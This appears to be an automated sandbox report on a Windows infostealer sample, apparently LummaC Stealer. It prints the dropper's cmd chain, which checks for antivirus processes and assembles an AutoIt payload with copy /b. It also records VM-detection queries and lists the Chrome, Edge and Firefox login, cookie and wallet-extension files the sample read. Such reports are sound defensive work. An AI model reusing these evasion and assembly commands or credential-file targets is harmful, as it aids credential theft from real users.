Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2005			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1398			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 8144	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 8144	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4248	Thread sleep count: 2005 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6016	Thread sleep count: 1398 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: extrac32.exe, 00000008.00000003.1732506920.0000000006B98000.00000004.00000020.00020000.00000000.sdmp, Banned.com, 0000000C.00000000.1737341363.0000000000263000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Race.8.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
